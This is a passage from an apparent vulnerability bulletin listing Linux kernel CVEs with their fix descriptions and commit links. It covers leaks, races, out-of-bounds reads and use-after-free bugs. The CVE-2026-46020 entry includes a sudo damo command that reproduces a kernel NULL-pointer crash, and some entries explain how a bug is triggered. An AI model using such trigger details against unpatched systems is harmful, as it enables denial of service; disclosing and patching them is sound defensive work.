kdamond is already on the termination steps, so it never handles the new request. As a result, the damos_walk() caller thread waits infinitely. Fix this by introducing another damon_ctx field, namely walk_control_obsolete. It is protected by the damon_ctx->walk_control_lock, which protects damos_walk() request registration. Initialize (unset) it in kdamond_fn() before letting damon_start() return and set it just before the cancelling of the remaining damos_walk() request is executed. damos_walk() reads the obsolete field under the lock and avoids adding a new request. After this change, only requests that are guaranteed to be handled or cancelled are registered. Hence the after-registration DAMON context termination check is no longer needed. Remove it together. The issue is found by sashiko [1]. | 2026-05-27 | not yet calculated | CVE-2026-46008 | https://git.kernel.org/stable/c/0ba956a239ba6e3fae8555d3660e22e675be63b5 https://git.kernel.org/stable/c/33c3f6c2b48cd84b441dba1ee3e62290e53930f4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI: endpoint: pci-epf-ntb: Remove duplicate resource teardown epf_ntb_epc_destroy() duplicates the teardown that the caller is supposed to do later. This leads to an oops when .allow_link fails or when .drop_link is performed. Remove the helper. Also drop pci_epc_put(). EPC device refcounting is tied to configfs EPC group lifetime, and pci_epc_put() in the .drop_link path is sufficient. | 2026-05-27 | not yet calculated | CVE-2026-46009 | https://git.kernel.org/stable/c/72099f015d3c77bf2eb703d1aab113bd7a60915a https://git.kernel.org/stable/c/756ca5e7ed22d9045bb4de4c981f9149278d5cd3 https://git.kernel.org/stable/c/65fc57c8b8f0b31be62be291cb1bb01755cec85d https://git.kernel.org/stable/c/e813c95e4c8edd31599081e6356e20ada30e266d https://git.kernel.org/stable/c/3446beddba450c8d6f9aca2f028712ac527fead3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rxrpc: Fix memory leaks in rxkad_verify_response() Fix rxkad_verify_response() to free the ticket and the server key under all circumstances by initialising the ticket pointer to NULL and then making all paths through the function after the first allocation has been done go through a single common epilogue that just releases everything - where all the releases skip on a NULL pointer. | 2026-05-27 | not yet calculated | CVE-2026-46012 | https://git.kernel.org/stable/c/c4b8f32e73eafd4a5076be890c7c8506ec04567c https://git.kernel.org/stable/c/852b9d64cea421336579b2de3d1338dfa677e2dd https://git.kernel.org/stable/c/861b9a0a1823bf064a7b810d29502a9ef043f40f https://git.kernel.org/stable/c/c91f33fb8356dedc82bc56ce210f1a5dbee62a52 https://git.kernel.org/stable/c/34f61a07e0cdefaecd3ec03bb5fb22215643678f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/memfd_luo: fix physical address conversion in put_folios cleanup In memfd_luo_retrieve_folios()'s put_folios cleanup path: 1. kho_restore_folio() expects a phys_addr_t (physical address) but receives a raw PFN (pfolio->pfn). This causes kho_restore_page() to check the wrong physical address (pfn << PAGE_SHIFT instead of the actual physical address). 2. This loop lacks the !pfolio->pfn check that exists in the main retrieval loop and memfd_luo_discard_folios(), which could incorrectly process sparse file holes where pfn=0. Fix by converting PFN to physical address with PFN_PHYS() and adding the !pfolio->pfn check, matching the pattern used elsewhere in this file. This issue was identified by the AI review. https://sashiko.dev/#/patchset/20260323110747.193569-1-duanchenghao@kylinos.cn | 2026-05-27 | not yet calculated | CVE-2026-46013 | https://git.kernel.org/stable/c/bd0d6bde286a2b8e3ae7975b0dcc2d43875d5fc9 https://git.kernel.org/stable/c/3538f90ab89aaf302782b4b073a0aae66904cd67 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: SVM: Add missing save/restore handling of LBR MSRs MSR_IA32_DEBUGCTLMSR and LBR MSRs are currently not enumerated by KVM_GET_MSR_INDEX_LIST, and LBR MSRs cannot be set with KVM_SET_MSRS. So save/restore is completely broken. Fix it by adding the MSRs to msrs_to_save_base, and allowing writes to LBR MSRs from userspace only (as they are read-only MSRs) if LBR virtualization is enabled. Additionally, to correctly restore L1's LBRs while L2 is running, make sure the LBRs are copied from the captured VMCB01 save area in svm_copy_vmrun_state(). Note, for VMX, this also fixes a flaw where MSR_IA32_DEBUGCTLMSR isn't reported as an MSR to save/restore. Note #2, over-reporting MSR_IA32_LASTxxx on Intel is ok, as KVM already handles unsupported reads and writes thanks to commit b5e2fec0ebc3 ("KVM: Ignore DEBUGCTL MSRs with no effect") (kvm_do_msr_access() will morph the unsupported userspace write into a nop). [sean: guard with lbrv checks, massage changelog] | 2026-05-27 | not yet calculated | CVE-2026-46014 | https://git.kernel.org/stable/c/2b922a42b531a82d7881add14a7698dcdc5e1f0a https://git.kernel.org/stable/c/13a89ada5dcfc2539514c83ba5a2c61157f1ec6c https://git.kernel.org/stable/c/3700f0788da6acf73b2df56690f4b201aa4aefd2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: remoteproc: xlnx: Only access buffer information if IPI is buffered In the receive callback check if message is NULL to prevent possibility of crash by NULL pointer dereferencing. | 2026-05-27 | not yet calculated | CVE-2026-46016 | https://git.kernel.org/stable/c/5d1451cb2cf6f3d9884d76035a1460aa9bb4b053 https://git.kernel.org/stable/c/7ddbf21116770b7011f2bb0a6056b7604b24c497 https://git.kernel.org/stable/c/06d0bed2552fd0dae27d374d4492a2b672e24eed https://git.kernel.org/stable/c/8242579859a78c801bb626e9aa4823aca93e28e7 https://git.kernel.org/stable/c/38dd6ccfdfbbe865569a52fe1ba9fa1478f672e6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm: fix deferred split queue races during migration migrate_folio_move() records the deferred split queue state from src and replays it on dst. Replaying it after remove_migration_ptes(src, dst, 0) makes dst visible before it is requeued, so a concurrent rmap-removal path can mark dst partially mapped and trip the WARN in deferred_split_folio(). Move the requeue before remove_migration_ptes() so dst is back on the deferred split queue before it becomes visible again. Because migration still holds dst locked at that point, teach deferred_split_scan() to requeue a folio when folio_trylock() fails. Otherwise a fully mapped underused folio can be dequeued by the shrinker and silently lost from split_queue. [ziy@nvidia.com: move the comment] | 2026-05-27 | not yet calculated | CVE-2026-46017 | https://git.kernel.org/stable/c/cbf75cf212ee6e499abc1757fb4b5ae6d70ed0aa https://git.kernel.org/stable/c/3bac01168982ec3e3bf87efdc1807c7933590a85 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: stop parsing UAC2 rates at MAX_NR_RATES parse_uac2_sample_rate_range() caps the number of enumerated rates at MAX_NR_RATES, but it only breaks out of the current rate loop. A malformed UAC2 RANGE response with additional triplets continues parsing the remaining triplets and repeatedly prints "invalid uac2 rates" while probe still holds register_mutex. Stop the whole parse once the cap is reached and return the number of rates collected so far. | 2026-05-27 | not yet calculated | CVE-2026-46018 | https://git.kernel.org/stable/c/ab5ba9fd138758ddc50222264ff246b31e397abf https://git.kernel.org/stable/c/ba036305323814ec1f8655313b2fa6a0f7048716 https://git.kernel.org/stable/c/4d7893a137eadb6163ea4298bf67d74b811d76ef https://git.kernel.org/stable/c/a0b78639ef09b2e77974a3de3b1c07f6de3c5e56 https://git.kernel.org/stable/c/3c318f97dcc50b2e0556a1813bd6958678e881fd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: atmel-aes - Fix 3-page memory leak in atmel_aes_buff_cleanup atmel_aes_buff_init() allocates 4 pages using __get_free_pages() with ATMEL_AES_BUFFER_ORDER, but atmel_aes_buff_cleanup() frees only the first page using free_page(), leaking the remaining 3 pages. Use free_pages() with ATMEL_AES_BUFFER_ORDER to fix the memory leak. | 2026-05-27 | not yet calculated | CVE-2026-46019 | https://git.kernel.org/stable/c/b63f1e2f0e319ad3fe4a58eb3db4fd50cc98baca https://git.kernel.org/stable/c/65b3589d39d05699c3850202f8333e5361033ea3 https://git.kernel.org/stable/c/61516b4a5b2647dc3f8f67b5dffaf038be997511 https://git.kernel.org/stable/c/230ad8a78fe67266b1ba4685da1abdd61471c5b8 https://git.kernel.org/stable/c/3fcfff4ed35f963380a68741bcd52742baff7f76 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/core: validate damos_quota_goal->nid for node_mem_{used,free}_bp Patch series "mm/damon/core: validate damos_quota_goal->nid". node_mem[cg]_{used,free}_bp DAMOS quota goals receive the node id. The node id is used for si_meminfo_node() and NODE_DATA() without proper validation. As a result, privileged users can trigger an out of bounds memory access using DAMON_SYSFS. Fix the issues. The issue was originally reported [1] with a fix by another author. The original author announced [2] that they will stop working, including on the fix that was still in the review stage. Hence I'm restarting this. This patch (of 2): Users can set damos_quota_goal->nid to an arbitrary value for node_mem_{used,free}_bp. But DAMON core is using those for si_meminfo_node() without validation of the value. This can result in out of bounds memory access. The issue can actually be triggered using the DAMON user-space tool (damo), like below. $ sudo ./damo start --damos_action stat \ --damos_quota_goal node_mem_used_bp 50% -1 \ --damos_quota_interval 1s $ sudo dmesg [...] [ 65.565986] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000098 Fix this issue by adding validation of the given node. If an invalid node id is given, it returns 0% for the used memory ratio, and 100% for the free memory ratio. | 2026-05-27 | not yet calculated | CVE-2026-46020 | https://git.kernel.org/stable/c/b09958e235f2b9cd3898b85a8529172afa80d212 https://git.kernel.org/stable/c/bcad74078708f2330a45b55358ebc38f8f4b1127 https://git.kernel.org/stable/c/40250b2dded0604a112be605f3828700d80ad7c2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: thermal: core: Fix thermal zone governor cleanup issues If thermal_zone_device_register_with_trips() fails after adding a thermal governor to the thermal zone being registered, the governor is not removed from it as appropriate which may lead to a memory leak. In turn, thermal_zone_device_unregister() calls thermal_set_governor() without acquiring the thermal zone lock beforehand which may race with a governor update via sysfs and may lead to a use-after-free in that case. Address these issues by adding two thermal_set_governor() calls, one to thermal_release() to remove the governor from the given thermal zone, and one to the thermal zone registration error path to cover failures preceding the thermal zone device registration. | 2026-05-27 | not yet calculated | CVE-2026-46021 | https://git.kernel.org/stable/c/37a430a2d4e66ec8238da6c7f7e48809bf265e13 https://git.kernel.org/stable/c/f412e541d25a3dfaf3d53e012ade6ff03cae8a45 https://git.kernel.org/stable/c/75f8f3c3e09122270986de9d7aa347d701676761 https://git.kernel.org/stable/c/64d4ebf91d082034bbc5ae3ba2d7fd800bc02d06 https://git.kernel.org/stable/c/41ff66baf81c6541f4f985dd7eac4494d03d9440 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: misc: ibmasm: fix OOB MMIO read in ibmasm_handle_mouse_interrupt() ibmasm_handle_mouse_interrupt() performs an out-of-bounds MMIO read when the queue reader or writer index from hardware exceeds REMOTE_QUEUE_SIZE (60). A compromised service processor can trigger this by writing an out-of-range value to the reader or writer MMIO register before asserting an interrupt. Since writer is re-read from hardware on every loop iteration, it can also be set to an out-of-range value after the loop has already started. The root cause is that get_queue_reader() and get_queue_writer() return raw readl() values that are passed directly into get_queue_entry(), which computes: queue_begin + reader * sizeof(struct remote_input) with no bounds check. This unchecked MMIO address is then passed to memcpy_fromio(), reading 8 bytes from unintended device registers. For sufficiently large values the address falls outside the PCI BAR mapping entirely, triggering a machine check exception. Fix by checking both indices against REMOTE_QUEUE_SIZE at the top of the loop body, before any call to get_queue_entry(). On an out-of-range value, reset the reader register to 0 via set_queue_reader() before breaking, so that normal queue operation can resume if the corrupted hardware state is transient. | 2026-05-27 | not yet calculated | CVE-2026-46022 | https://git.kernel.org/stable/c/fc7e9a74e32299d7e93e178ca482a0b59ef1595b https://git.kernel.org/stable/c/07c4f18b303106e6b24492c12b95d48a4b985841 https://git.kernel.org/stable/c/22a16d3eafee92a165c756081587c95850127107 https://git.kernel.org/stable/c/1ca75f6b74ec7f685464e5745ecfcf3a76d284e9 https://git.kernel.org/stable/c/4b6e6ead556734bdc14024c5f837132b1e7a4b84 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm mirror: fix integer overflow in create_dirty_log() The argument count calculation in create_dirty_log() performs `*args_used = 2 + param_count` before validating against argc. When a user provides a param_count close to UINT_MAX via the device mapper table string, this unsigned addition wraps around to a small value, causing the subsequent `argc < *args_used` check to be bypassed. The overflowed param_count is then passed as argc to dm_dirty_log_create(), where it can cause out-of-bounds reads on the argv array. Fix by comparing param_count against argc - 2 before performing the addition, following the same pattern used by parse_features() in the same file. Since argc >= 2 is already guaranteed, the subtraction is safe. | 2026-05-27 | not yet calculated | CVE-2026-46023 | https://git.kernel.org/stable/c/35f6b3281efd44d19110574663bc17a610bc73b9 https://git.kernel.org/stable/c/47dad9eea75d33212d3d2cea10e7ed6a1bfc0713 https://git.kernel.org/stable/c/87c99a50e0fdc68a5b9b52a94d49452cd3ff02ca https://git.kernel.org/stable/c/17a08791d428885d00e510864283a7b839792368 https://git.kernel.org/stable/c/4c788c6f921b22f9b6c3f316c4a071c05683e7de |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/core: fix damon_call() vs kdamond_fn() exit race Patch series "mm/damon/core: fix damon_call()/damos_walk() vs kdmond exit race". damon_call() and damos_walk() can leak memory and/or deadlock when they race with kdamond terminations. Fix those. This patch (of 2): When kdamond_fn() main loop is finished, the function cancels all remaining damon_call() requests and unsets the damon_ctx->kdamond so that API callers and API functions themselves can know the context is terminated. damon_call() adds the caller's request to the queue first. After that, it checks whether the kdamond of the damon_ctx is still running (damon_ctx->kdamond is set). Only if the kdamond is running, damon_call() starts waiting for the kdamond's handling of the newly added request. The damon_call() requests registration and damon_ctx->kdamond unset are protected by different mutexes, though. Hence, damon_call() could race with damon_ctx->kdamond unset, and result in deadlocks. For example, let's suppose kdamond successfully finished the damon_call() requests cancelling. Right after that, damon_call() is called for the context. It registers the new request, and sees the context is still running, because damon_ctx->kdamond unset is not yet done. Hence the damon_call() caller starts waiting for the handling of the request. However, the kdamond is already on the termination steps, so it never handles the new request. As a result, the damon_call() caller thread waits infinitely. Fix this by introducing another damon_ctx field, namely call_controls_obsolete. It is protected by the damon_ctx->call_controls_lock, which protects damon_call() requests registration. Initialize (unset) it in kdamond_fn() before letting damon_start() return and set it just before the cancelling of remaining damon_call() requests is executed. damon_call() reads the obsolete field under the lock and avoids adding a new request. After this change, only requests that are guaranteed to be handled or cancelled are registered. Hence the after-registration DAMON context termination check is no longer needed. Remove it together. Note that the deadlock will not happen when damon_call() is called for a repeat mode request. In this case, damon_call() returns instead of waiting for the handling when the request registration succeeds and it shows the kdamond is running. However, if the request also has dealloc_on_cancel, the request memory would be leaked. The issue is found by sashiko [1]. | 2026-05-27 | not yet calculated | CVE-2026-46025 | https://git.kernel.org/stable/c/2691332ad88b57179c38653e2cd613d5820a52cf https://git.kernel.org/stable/c/e6a053a6f4b5048746c49432a5cc5b79fe4695fe https://git.kernel.org/stable/c/55da81663b9642dd046b26dd6f1baddbcf337c1e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: qrtr: ns: Limit the maximum number of lookups Current code does no bound checking on the number of lookups a client can perform. Though the code restricts the lookups to local clients, there is still a possibility of a malicious local client sending a flood of NEW_LOOKUP messages over the same socket. Fix this issue by limiting the maximum number of lookups to 64 globally. Since the nameserver allows only at most one local observer, this global lookup count will ensure that the lookups stay within the limit. Note that the limit of 64 is chosen based on the current platform requirements. If the requirement changes in the future, this limit can be increased. | 2026-05-27 | not yet calculated | CVE-2026-46026 | https://git.kernel.org/stable/c/0dbec101a7076e9b1e4bd1876f7cf07c56ff4ce3 https://git.kernel.org/stable/c/76adf8f69b0bb3ab20be7c58f5d555027332d113 https://git.kernel.org/stable/c/20855cef7e659ef84ac73251256fa530819b2346 https://git.kernel.org/stable/c/2b930bc77e00cb27e1d6e1d497b3b596283465ef https://git.kernel.org/stable/c/5640227d9a21c6a8be249a10677b832e7f40dc55 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: algif_aead - snapshot IV for async AEAD requests AF_ALG AEAD AIO requests currently use the socket-wide IV buffer during request processing. For async requests, later socket activity can update that shared state before the original request has fully completed, which can lead to inconsistent IV handling. Snapshot the IV into per-request storage when preparing the AEAD request, so in-flight operations no longer depend on mutable socket state. | 2026-05-27 | not yet calculated | CVE-2026-46028 | https://git.kernel.org/stable/c/08ea39a556ecd39b33c2b4888861001c6706a62e https://git.kernel.org/stable/c/a920cabdb0b7cf1f4e11a20524253ae5bd09092b https://git.kernel.org/stable/c/fa0fcec9b49d58e71df7ede91ecd86855f608e85 https://git.kernel.org/stable/c/c2138c9bd02af19e0b407376140cd5435b0d81da https://git.kernel.org/stable/c/46fdb39e83227b5d39f7c934a0947ea913f13c18 https://git.kernel.org/stable/c/ebc235675f24b0e3f8bc92b8419471d42f837d8f https://git.kernel.org/stable/c/3d72f8c6490dc79210b64270740cb2a8619361a4 https://git.kernel.org/stable/c/5aa58c3a572b3e3b6c786953339f7978b845cc52 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: EDAC/versalnet: Fix device_node leak in mc_probe() of_parse_phandle() returns a device_node reference that must be released with of_node_put(). The original code never freed r5_core_node on any exit path, causing a memory leak. Fix this by using the automatic cleanup attribute __free(device_node) which ensures of_node_put() is called when the variable goes out of scope. | 2026-05-27 | not yet calculated | CVE-2026-46030 | https://git.kernel.org/stable/c/b6e61356ad24987be40bf25369d22dd8dd00a513 https://git.kernel.org/stable/c/17e136993b2b5111d1ee1c57bbd188ae0bb0e128 https://git.kernel.org/stable/c/5c709b376460ff322580c41600e31c02f7cc0307 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: nSVM: Triple fault if restore host CR3 fails on nested #VMEXIT If loading L1's CR3 fails on a nested #VMEXIT, nested_svm_vmexit() returns an error code that is ignored by most callers, and continues to run L1 with corrupted state. A sane recovery is not possible in this case, and HW behavior is to cause a shutdown. Inject a triple fault instead, and do not return early from nested_svm_vmexit(). Continue cleaning up the vCPU state (e.g. clear pending exceptions), to handle the failure as gracefully as possible. From the APM: Upon #VMEXIT, the processor performs the following actions in order to return to the host execution context: ... if (illegal host state loaded, or exception while loading host state) shutdown else execute first host instruction following the VMRUN Remove the return value of nested_svm_vmexit(), which is mostly unchecked anyway. | 2026-05-27 | not yet calculated | CVE-2026-46032 | https://git.kernel.org/stable/c/9a738cf170a4a2332ea3a15e23ec65b5757fe4a1 https://git.kernel.org/stable/c/5d291ef0585ed880ed4dd71ea1a5965e0a65fb53 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: authencesn - reject short ahash digests during instance creation authencesn requires either a zero authsize or an authsize of at least 4 bytes because the ESN encrypt/decrypt paths always move 4 bytes of high-order sequence number data at the end of the authenticated data. While crypto_authenc_esn_setauthsize() already rejects explicit non-zero authsizes in the range 1..3, crypto_authenc_esn_create() still copied auth->digestsize into inst->alg.maxauthsize without validating it. The AEAD core then initialized the tfm's default authsize from that value. As a result, selecting an ahash with digest size 1..3, such as cbcmac(cipher_null), exposed authencesn instances whose default authsize was invalid even though setauthsize() would have rejected the same value. AF_ALG could then trigger the ESN tail handling with a too-short tag and hit an out-of-bounds access. Reject authencesn instances whose ahash digest size is in the invalid non-zero range 1..3 so that no tfm can inherit an unsupported default authsize. | 2026-05-27 | not yet calculated | CVE-2026-46033 | https://git.kernel.org/stable/c/b69933e97efea238ebbfcf70c2b1be1cd03f13e3 https://git.kernel.org/stable/c/67f1f0933cc3d78dde222842bcad2778ec7a0b88 https://git.kernel.org/stable/c/b42821c15445f93daea3e76ada682b2b7181c476 https://git.kernel.org/stable/c/9aff81e8217e9de2929084b03b3c7f81988c112b https://git.kernel.org/stable/c/5db6ef9847717329f12c5ea8aba7e9f588a980c0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vfio/cdx: Fix NULL pointer dereference in interrupt trigger path Add validation to ensure MSI is configured before accessing cdx_irqs array in vfio_cdx_set_msi_trigger(). Without this check, userspace can trigger a NULL pointer dereference by calling VFIO_DEVICE_SET_IRQS with VFIO_IRQ_SET_DATA_BOOL or VFIO_IRQ_SET_DATA_NONE flags before ever setting up interrupts via VFIO_IRQ_SET_DATA_EVENTFD. The vfio_cdx_msi_enable() function allocates the cdx_irqs array and sets config_msi to 1 only when called through the EVENTFD path. The trigger loop (for DATA_BOOL/DATA_NONE) assumed this had already been done, but there was no enforcement of this call ordering. This matches the protection used in the PCI VFIO driver where vfio_pci_set_msi_trigger() checks irq_is() before the trigger loop. | 2026-05-27 | not yet calculated | CVE-2026-46034 | https://git.kernel.org/stable/c/51bf7638f33aece41cb3f4cbeb942cc52950e329 https://git.kernel.org/stable/c/5d6c349c9823eb819fed8b537b088cf38126018c https://git.kernel.org/stable/c/338a736aaf15e8ba3635ce20b29af5b8fc15e66a https://git.kernel.org/stable/c/5ea5880764cbb164afb17a62e76ca75dc371409d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/page_alloc: return NULL early from alloc_frozen_pages_nolock() in NMI on UP On UP kernels (!CONFIG_SMP), spin_trylock() is a no-op that unconditionally succeeds even when the lock is already held. As a result, alloc_frozen_pages_nolock() called from NMI context can re-enter rmqueue() and acquire the zone lock that the interrupted context is already holding, corrupting the freelists. With CONFIG_DEBUG_SPINLOCK on UP, the following BUG is triggered with the slub_kunit test module: BUG: spinlock trylock failure on UP on CPU#0, kunit_try_catch/243 [...] Call Trace: <NMI> dump_stack_lvl+0x3f/0x60 do_raw_spin_trylock+0x41/0x50 _raw_spin_trylock+0x24/0x50 rmqueue.isra.0+0x2a9/0xa70 get_page_from_freelist+0xeb/0x450 alloc_frozen_pages_nolock_noprof+0x111/0x1e0 allocate_slab+0x42a/0x500 ___slab_alloc+0xa7/0x4c0 kmalloc_nolock_noprof+0x164/0x310 [...] </NMI> Fix this by returning NULL early when invoked from NMI on a UP kernel. | 2026-05-27 | not yet calculated | CVE-2026-46035 | https://git.kernel.org/stable/c/05b4ed8bef30bba4f559c8d835e2dd20c48cf8a4 https://git.kernel.org/stable/c/a6d57efeaae3f3b3656514f600eac96be713d90e https://git.kernel.org/stable/c/620b46ed6ae17c8438d889c8c0cfddab36a1476c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: qrtr: ns: Free the node during ctrl_cmd_bye() A node sends the BYE packet when it is about to go down. So the nameserver should advertise the removal of the node to all remote and local observers and finally free the node. But currently, the nameserver doesn't free the node memory even after processing the BYE packet. This causes the node memory to leak. Hence, remove the node from the XArray list and free the node memory during both the success and failure cases of ctrl_cmd_bye(). | 2026-05-27 | not yet calculated | CVE-2026-46038 | https://git.kernel.org/stable/c/ff78ed177a66763085e3214d6fbe13ca8f0b3f11 https://git.kernel.org/stable/c/65932f5102bb5377db36c8a4f0c28179a1967a9a https://git.kernel.org/stable/c/154fc7fe3f62c46891c3c4302f4b5b5391c932e6 https://git.kernel.org/stable/c/076e4b162d6caba12c229e7f262df5b6881162b0 https://git.kernel.org/stable/c/68efba36446a7774ea5b971257ade049272a07ac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: inotify: fix watch count leak when fsnotify_add_inode_mark_locked() fails When fsnotify_add_inode_mark_locked() fails in inotify_new_watch(), the error path calls inotify_remove_from_idr() but does not call dec_inotify_watches() to undo the preceding inc_inotify_watches(). This leaks a watch count, and repeated failures can exhaust the max_user_watches limit with -ENOSPC even when no watches are active. Prior to commit 1cce1eea0aff ("inotify: Convert to using per-namespace limits"), the watch count was incremented after fsnotify_add_mark_locked() succeeded, so this path was not affected. The conversion moved inc_inotify_watches() before the mark insertion without adding the corresponding rollback. Add the missing dec_inotify_watches() call in the error path. | 2026-05-27 | not yet calculated | CVE-2026-46040 | https://git.kernel.org/stable/c/8bcc1cd237ab5ccfdd102869fa031c541943cf40 https://git.kernel.org/stable/c/73ddc8518a32baff6bc17afda4ee1ebae5b4ed12 https://git.kernel.org/stable/c/fdaa42ca370d056428e5e171247c8fdce8dff36a https://git.kernel.org/stable/c/9e48844f708eb48bae4e79cb21edc097c966306d https://git.kernel.org/stable/c/6a320935fa4293e9e599ec9f85dc9eb3be7029f8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: greybus: gb-beagleplay: fix sleep in atomic context in hdlc_tx_frames() hdlc_append() calls usleep_range() to wait for circular buffer space, but it is called with tx_producer_lock (a spinlock) held via hdlc_tx_frames() -> hdlc_append_tx_frame()/hdlc_append_tx_u8()/etc. Sleeping while holding a spinlock is illegal and can trigger "BUG: scheduling while atomic". Fix this by moving the buffer-space wait out of hdlc_append() and into hdlc_tx_frames(), before the spinlock is acquired. The new flow: 1. Pre-calculate the worst-case encoded frame length. 2. Wait (with sleep) outside the lock until enough space is available, kicking the TX consumer work to drain the buffer. 3. Acquire the spinlock, re-verify space, and write the entire frame atomically. This ensures that sleeping only happens without any lock held, and that frames are either fully enqueued or not written at all. This bug is found by CodeQL static analysis tool (interprocedural sleep-in-atomic query) and my code review. | 2026-05-27 | not yet calculated | CVE-2026-46041 | https://git.kernel.org/stable/c/9f2b87bcdfed55145acbf932dc12f2c057145cad https://git.kernel.org/stable/c/b2801647c203a38e013802e9e9616b5bfac64968 https://git.kernel.org/stable/c/51667fe2d9294d66e0228b9f51d1f01b6680a641 https://git.kernel.org/stable/c/6b526dca0966f2370835765019a54319b78fca8d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/mempolicy: fix memory leaks in weighted_interleave_auto_store() weighted_interleave_auto_store() fetches old_wi_state inside the if (!input) block only. This causes two memory leaks: 1. When a user writes "false" and the current mode is already manual, the function returns early without freeing the freshly allocated new_wi_state. 2. When a user writes "true", old_wi_state stays NULL because the fetch is skipped entirely. The old state is then overwritten by rcu_assign_pointer() but never freed, since the cleanup path is gated on old_wi_state being non-NULL. A user can trigger this repeatedly by writing "1" in a loop. Fix both leaks by moving the old_wi_state fetch before the input check, making it unconditional. This also allows a unified early return for both "true" and "false" when the requested mode matches the current mode. Reviewed by: Donet Tom <donettom@linux.ibm.com> | 2026-05-27 | not yet calculated | CVE-2026-46042 | https://git.kernel.org/stable/c/c42a7efb9060d89b72708ffaf255d0002c2164a7 https://git.kernel.org/stable/c/39caa9ca863f96b3d00447c5aa200cabda489856 https://git.kernel.org/stable/c/6fae274ce0e3109cbbc4c18b354eaace1f0af7d7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipmi:ssif: Clean up kthread on errors If an error occurs after the ssif kthread is created, but before the main IPMI code starts the ssif interface, the ssif kthread will not be stopped. So make sure the kthread is stopped on an error condition if it is running. | 2026-05-27 | not yet calculated | CVE-2026-46044 | https://git.kernel.org/stable/c/858bc8b9edb6eaf0522900128bb9053e2df6b0f6 https://git.kernel.org/stable/c/800febc637d1c1974b1e899dea8a07e115d60766 https://git.kernel.org/stable/c/75c486cb1bcaa1a3ec3a6438498176a3a4998ae4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/md-llbitmap: skip reading rdevs that are not in_sync When reading bitmap pages from member disks, the code iterates through all rdevs and attempts to read from the first available one. However, it only checks for raid_disk assignment and Faulty flag, missing the In_sync flag check. This can cause bitmap data to be read from spare disks that are still being rebuilt and don't have valid bitmap information yet. Reading stale or uninitialized bitmap data from such disks can lead to incorrect dirty bit tracking, potentially causing data corruption during recovery or normal operation. Add the In_sync flag check to ensure bitmap pages are only read from fully synchronized member disks that have valid bitmap data. | 2026-05-27 | not yet calculated | CVE-2026-46045 | https://git.kernel.org/stable/c/98623c7e2a51eab1833c8628d33fa9c6ef3ce325 https://git.kernel.org/stable/c/3115fa2f62970d98f2a639145fb8e2767db8bbf9 https://git.kernel.org/stable/c/7701e68b5072faa03a8f30b4081dc16df9092381 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix missing brelse() in ext4_xattr_inode_dec_ref_all() The commit c8e008b60492 ("ext4: ignore xattrs past end") introduced a refcount leak when block_csum is false. ext4_xattr_inode_dec_ref_all() calls ext4_get_inode_loc() to get iloc.bh, but never releases it with brelse(). | 2026-05-27 | not yet calculated | CVE-2026-46046 | https://git.kernel.org/stable/c/1bc1107a3a403a6d440673ed6666f7b07ef868a8 https://git.kernel.org/stable/c/097227f1ffe1a85bc3c359f81c71e3d40e06e920 https://git.kernel.org/stable/c/1e6b0a69bf2c9c819255c7566e4355536d81d9cf https://git.kernel.org/stable/c/f072906688933bf47fabbaf63560be03357c8298 https://git.kernel.org/stable/c/77d059519382bd66283e6a4e83ee186e87e7708f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: qrtr: ns: Fix use-after-free in driver remove() In the remove callback, if a packet arrives after destroy_workqueue() is called, but before sock_release(), the qrtr_ns_data_ready() callback will try to queue the work, causing a use-after-free issue. Fix this issue by saving the default 'sk_data_ready' callback during qrtr_ns_init() and using it to replace the qrtr_ns_data_ready() callback at the start of remove(). This ensures that even if a packet arrives after destroy_workqueue(), the work struct will not be dereferenced. Note that it is also required to ensure that the RX threads are completed before destroying the workqueue, because the threads could be using the qrtr_ns_data_ready() callback. | 2026-05-27 | not yet calculated | CVE-2026-46047 | https://git.kernel.org/stable/c/0f313eb6a8f6dffa491373cf3afab979fa1c02f4 https://git.kernel.org/stable/c/db3c60ec772de30acae92d560dfcc5258e58dbe8 https://git.kernel.org/stable/c/2e127ceb1c415e246076d8e09e23e443a7a2038f https://git.kernel.org/stable/c/f96779e916576e81430ebb326baff6e433fef8ae https://git.kernel.org/stable/c/7809fea20c9404bfcfa6112ec08d1fe1d3520beb |
